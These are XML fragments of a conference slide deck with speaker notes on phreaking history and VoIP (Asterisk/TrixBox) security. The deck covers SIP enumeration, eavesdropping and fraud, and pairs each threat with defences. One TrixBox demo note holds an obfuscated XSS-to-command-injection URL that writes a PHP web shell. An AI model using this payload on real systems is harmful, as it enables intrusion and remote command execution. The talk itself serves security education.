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40BAD1-7915-4CBD-A011-317F684670B8}">
  <a:tblStyle styleId="{7B40BAD1-7915-4CBD-A011-317F684670B8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98" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="1210" y="53"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="-67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8893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deweb.com/phonetrip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hworld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npa.com/reports/area_code_relief_planning.html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spadres.info/thorg/lbb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wideweb.com/phonetrips/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://spectrum.ieee.org/telecom/standards/phreaking-out-ma-bel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270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could happen? Trends, Video Chat? iShitWatch etc. Android Sip support added, Why?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4198469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won’t be showing any L33T new exploits, but these techniques are still effective and need to be defended against.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This is not about ALL the things possible with SIP or hacking on VoIP. There’s no way we have time for that!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151726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AGI Added before 2002. - Need Slide Transition.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222332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AGI Added before 2002. - Need Slide Transition.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3221499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33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if you keep piling up crap on top of things, eventually this will happen.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1084196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As we cover threats we’ll demonstrate an example attack, then cover a variety of the ways that category can be defended against.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Ok, there is some shit that is *possible*, but not *probable*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1286682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763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Phreaks dialed numbers outside of the normal dialing pattern too. There were test numbers and prefixes that could affect routing.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http://www.wideweb.com/phonetrips/</a:t>
            </a:r>
          </a:p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http://www.phworld.org/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139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Footprinting - profiling what type of system is being run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Scanning - to see what ports are open and confirm the type of system (pbx, proxy, phone, or something else) and what types of vulnerabilities might exist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Enumeration - determine what extensions are provisioned &amp; whether they require credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211315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949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This is pretty funny, kinda SE to reset techs phones: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https://plus.google.com/app/basic/stream/z13letv44xvbxpmez23rzv04ks3mjrgcq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1710228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6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Note that the Server header (or User-Agent in other SIP stacks) tells us what is being run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Format for branch and call-id can reveal which PBX is being run, and sometimes if there’s an SBC or proxy in the middle that appends or replaces the call-id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231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This is why TLS and SRTP were added. BUT, there are still tons of attacks against TLS right? Also, certificate management in hard.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1494215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Not really going to talk much about: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Credential Cracking - lots of videos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Eavesdropping / interception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intercepting call over network, either recorded or real time (?) through MITM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</a:rPr>
              <a:t>channel monitoring - asterisk terminology allows server side interaction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signaling manipulation - more useful for eavesdropping...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media manipulation - possible, but I’ve never heard of a real world use of this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87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666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default user-agent string is generally not used for anything. Change it to be something generic, or make it look like you’re using a different manufacturer’s product!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Known bad user agents are from SIP hacking tools that try to get the user-agent type and/or enumerate your extensions. Most of them have a known user-agent setting.</a:t>
            </a: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Most IPS / IDS and firewalls don’t stop SIP enumeration scans since the messages look legitimate. The system needs to monitor for number of failed auths by IP for a single user.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3816048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57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841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Make the point that both voip and non-voip systems are attacked. You can run a voip call generator out your SIP trunk and hit analog.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Large companies vs. small companies &amp; PBX, though you never know what goes unreported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TDoS is a DoS vector...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274353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560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Not sure if I like the image.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1679664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Call Teardown: Works on ancient phones, but most phones, proxies and B2BUAs now require Call ID, From Tag, and To Tag. You need MITM.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can also de-register phones if you can hit the PBX with a de-register. I’m totally doing this if SIP phones make it to airplanes.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Fuzzing SIP seemed to die in 2008 or so. Not aware of any comprehensive projects.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262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30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BCP 38 to block spoofed IPs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3475434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709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511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Anything you can imagine, fraud, DoS, BotNets, Profit insert other buzzwords here - APT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100326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758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 sure this is for TrixBox - Is for Asterisk, try to find TrixBox or include Both?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45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Doesn’t work in newest Chrome - FF is vulnerable to XSS.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LFI works for authenticated users, but is kind of meh given the platform and audience.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4013635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983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Amp Portal config has some great goodies in it. They did something right - You can’t read all files: apache logs, /proc/fd (etc) and/or phpinput://</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1587600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Video Done</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1547505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Video Done</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41388425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Video Done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http://192.168.1.50/user/help/html/index.php?id_nodo=%22onmouseover%3dwindow.location.replace%28window.atob%28%27aHR0cDovLzE5Mi4xNjguMS41MC9tYWludC9tb2R1bGVzL2hvbWUvaW5kZXgucGhwP2xhbmc9TUY7ZWNobyAiPD9waHAgc3lzdGVtKFwkX0dFVFtcImNtZFwiXSk7Pz4iPnNoZWxsNi5waHA=%27%29%29;%22"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4231804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In the case of Trixbox, defensive code would have been good.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XSS = Easy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Multiple LFI’s, mostly same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RCE? Harder out of context context, same as other two.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9081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Still all pretty easy. WTH is with the purple?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36135255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Common Sense for these two. If you have to use an AIO, do your homework.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2. Pay attention to CVE’s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If you don’t know what it is, why are you building it? Configure LAMP &amp; Permissions properly if you must use a all-in-one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If you didn’t build it, how can you configure it?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4. Remote MySQL? Remote Root? Why!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25244331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40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131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98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go get a drink / bar if you’re uber awesomely 1337 and don’t need the intro - video will be online anyway.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Lets change the graph to reflect the slides &amp; images :)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2680720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PBXes cracked using credential cracking software or manual labor pools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Eavesdropping motivations? - stalking, data theft, illegal gov’t surveillance. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1305083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1784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credential cracking protections - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - good passwords, user &lt;&gt; extension, log analysis, behavioral analysis. Crack your own?</a:t>
            </a:r>
          </a:p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http://www.nanpa.com/reports/area_code_relief_planning.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> has list of all NPAs, including foreign ones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264 ANGUILLA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268 ANTIGUA/BARBUDA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242 BAHAMAS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246 BARBADOS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441 BERMUDA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284 BRITISH VIRGIN ISLANDS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345 CAYMAN ISLANDS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767 DOMINICA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809 DOMINICAN REPUBLIC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829 DOMINICAN REPUBLIC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849 DOMINICAN REPUBLIC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473 GRENADA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658 JAMAICA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876 JAMAICA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664 MONTSERRAT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721 SINT MAARTEN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869 ST. KITTS AND NEVIS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758 ST. LUCIA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784 ST. VINCENT &amp; GRENADINES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868 TRINIDAD AND TOBAGO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649 TURKS &amp; CAICOS ISLANDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40710948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617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1502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1396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06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First telegraph live in 1844 – DC to Baltimore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First phone in Boston suburb 1877 – you paid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for the line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Strowger was an undertaker whose business was being stolen.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Competitor’s wife was an operator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Letters on the phone result of dialing exchange name abbreviations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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>design flaw - in-band signaling that could be replicated from the user handset. Thus 2600 supervisory tone &amp; SF dialing. Important to point out that MF used for signaling &lt;&gt; MF on your phone.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365227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AT&amp;T estimated they’d need 1 MM operators by the 60s, which drove work on an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="0" dirty="0" smtClean="0"/>
              <a:t> electronic switch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 smtClean="0"/>
              <a:t>4A used for long distance dialing, metal cards used to select the routes – took operators out of the equation, making phreaking less about social engineering, and more about the technical aspects</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0" smtClean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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>design flaw - in-band signaling that could be replicated from the user handset. Thus 2600 supervisory tone &amp; SF dialing. Important to point out that MF used for signaling &lt;&gt; MF on your phone.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2102331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Tried to recreate tones with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tape recorders, organs, whistling, and tone generators.</a:t>
            </a:r>
          </a:p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Others figured out 2600 Mhz through instruction, mail-order (!), or through hearing on the news in ‘63 that it was there to find!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http://www.lospadres.info/thorg/lbb.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (Secrets of the Little Blue Box)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See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http://spectrum.ieee.org/telecom/standards/phreaking-out-ma-bell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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http://www.wideweb.com/phonetrips/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1169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19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ip-info.org/wiki/view/Asterisk+AG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oip-info.org/wiki/view/Asterisk+AG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spberry-asterisk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registered436/CC1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asteriskathome/review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://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/stats/json?start_date=2010-01-01&amp;end_date=2015-01-01" TargetMode="Externa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hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2008/opdos-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2009/Asterisk.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2012/Asterisk.html" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/opbyp-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2009/opginf-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2013/opginf-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/hasexp-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2007/opov-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide38.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2008/opginf-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2009/opov-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2012/opov-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/opgpriv-1/Asterisk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vedetails.com/vulnerability-list/vendor_id-6284/year-2007/opec-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2007/opgpriv-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2011/Asterisk.html" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2013/opec-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/opov-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/opginf-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2007/opdos-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2008/opov-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2010/opdos-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2012/opec-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/opec-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2007/opginf-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2009/opdos-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2013/opdos-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2007/Asterisk.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2007/opbyp-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2008/opec-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2010/Asterisk.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2012/opdos-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2013/Asterisk.html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/opdos-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2007/opsqli-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vendor/6284/Asterisk.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2008/Asterisk.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2008/hasexp-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2011/opdos-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/year-2013/opov-1/Asterisk.html" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cvedetails.com/vulnerability-list/vendor_id-6284/opsqli-1/Asterisk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acketstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution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acketstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution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packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution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hyperlink" Target="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-shee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acketstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution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acketstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution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npa.com/reports/area_code_relief_planning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200" y="0"/>
            <a:ext cx="3417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Future of VoIP?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7036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Who know’s what JT will do?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Dude, WebRTC is the future of VoIP…. :)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600" y="1478887"/>
            <a:ext cx="3889199" cy="21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IT’S A BRAND NEW CAR!!!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172" y="1063374"/>
            <a:ext cx="4145675" cy="39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Introducing Asterisk!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88200" y="1200150"/>
            <a:ext cx="51381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600"/>
              <a:t>Asterisk Created in 1999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Now developed by Digium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GPL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Latest Stable: 13.0.0 (24 October 2014; 4 months ago)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11.13.1 (20 October 2014; 4 months ago)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Numerous Books published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2005 - Building Telephony Systems with Asterisk (PACKT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2007 - Asterisk for dummies published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2007 - Asterisk Hacking published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AsteriskBook (AsteriskDocs.org)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AMI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AGI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http://www.voip-info.org/wiki/view/Asterisk+AGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600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You can do some cool stuff with it.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300" y="1063375"/>
            <a:ext cx="3087499" cy="30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300" y="1063375"/>
            <a:ext cx="3087499" cy="28468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Introducing Asterisk!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8200" y="1200150"/>
            <a:ext cx="51381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Asterisk Created in 1999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Now developed by Digium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GPL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Latest Stable: 13.0.0 (24 October 2014; 4 months ago)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11.13.1 (20 October 2014; 4 months ago)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Numerous Books published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2005 - Building Telephony Systems with Asterisk (PACKT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2007 - Asterisk for dummies published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2007 - Asterisk Hacking published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600"/>
              <a:t>AsteriskBook (AsteriskDocs.org)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AMI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AGI (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http://www.voip-info.org/wiki/view/Asterisk+AGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600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You can do some cool stuff with it.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Asterisk variants...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9050" y="1173225"/>
            <a:ext cx="5667899" cy="3350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FreePBX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Asterisk@Home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TrixBox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PBX In a Flash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Elastix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AskoziaPBX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Asterisk for Raspberry Pi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http://www.raspberry-asterisk.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800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Many More!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459050" y="4633475"/>
            <a:ext cx="8229600" cy="39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http://en.wikipedia.org/wiki/Asterisk_(PBX)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400" y="1126125"/>
            <a:ext cx="2891249" cy="289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6313700" y="2272400"/>
            <a:ext cx="653100" cy="7892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625" y="2427525"/>
            <a:ext cx="546775" cy="5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7258900" y="2177100"/>
            <a:ext cx="653100" cy="789299"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F9F9F9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228724" y="2570375"/>
            <a:ext cx="594900" cy="19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50" y="998275"/>
            <a:ext cx="6901700" cy="37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Attack vs Defense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256275"/>
            <a:ext cx="3526376" cy="35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825" y="1256275"/>
            <a:ext cx="3526376" cy="35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482674" y="-304575"/>
            <a:ext cx="9626675" cy="605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Information Leakage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b="1"/>
              <a:t>What: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>When a system that is designed to be used only by authorized parties reveals the usage, equipment, location, or entities using the system, etc. to an unauthorized party.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Information Leakage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48959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b="1"/>
              <a:t>Phreaks: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Social engineered operators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Phone techs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Open technical journals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In-band clicks &amp; tones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u="sng"/>
              <a:t>Exhaustive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>dialing of numbers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Shared on looparounds &amp; eventually conf calls</a:t>
            </a:r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Underground papers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375" y="824825"/>
            <a:ext cx="28575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200" y="1533825"/>
            <a:ext cx="3732949" cy="26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Information Leakage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93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b="1"/>
              <a:t>Now: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Still just as easy! The curious can play in a VM at home or get inexpensive services. Just like early phreakers - read, listen, enumerate!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" sz="2400"/>
              <a:t>Most common techniques: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Port scanning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SIP stack &amp; OS fingerprinting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Extension enumeration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685800" y="-16857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Phony Business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366775" y="1011250"/>
            <a:ext cx="84267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What Goes Around Comes Back Around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ubTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1551150"/>
            <a:ext cx="22308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Patrick McNeil @unregistered436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subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6821550" y="1551150"/>
            <a:ext cx="16352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Owen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@LinuxBlog</a:t>
            </a:r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l="6393" t="11197" r="4804"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2193100" y="2384000"/>
